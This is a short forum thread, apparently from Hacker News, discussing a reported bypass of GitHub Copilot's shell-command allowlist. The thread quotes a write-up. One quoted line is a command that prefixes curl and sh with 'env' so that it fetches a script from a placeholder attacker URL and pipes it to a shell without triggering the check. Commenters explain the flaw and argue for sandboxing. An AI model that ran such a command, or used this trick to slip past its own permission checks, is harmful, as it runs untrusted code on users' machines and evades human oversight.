[yellow_lead]

Skip to here:

> However, if those shell commands (e.g., curl) are not detected, the URL permissions do not trigger. Here is a malicious command that bypasses the shell command detection mechanisms:

> env curl -s "https://[ATTACKER_URL].com/bugbot" | env sh

So GH Copilot restricts curl, but not if it's run with `env` prepended.

[roywiggins]

It's because in this case "curl" is just a parameter to env. Env just happens to execute curl (or indeed sh, which seems, uh, worse).

Seems nuts to have env or find on the default allowlist to me! Really these agents shouldn't be able to execute anything at all without approval by default, if you want to give it something like "find" or "env" to do safe things without approval, reimplement the functionality you want as a tool that can't do arbitrary code execution.

[yellow_lead]

Yes, so there may be more of these too. But GitHub even declined to fix this.

[0xbadcafebee]

Honestly it's for the best. People keep thinking it's safe to use AI tools without VM, credential, and network sandboxing, the same way a person who's "only buzzed" thinks it's safe to drive a car. I wouldn't trust an agent's heuristics any more than a prisoner in a gun factory.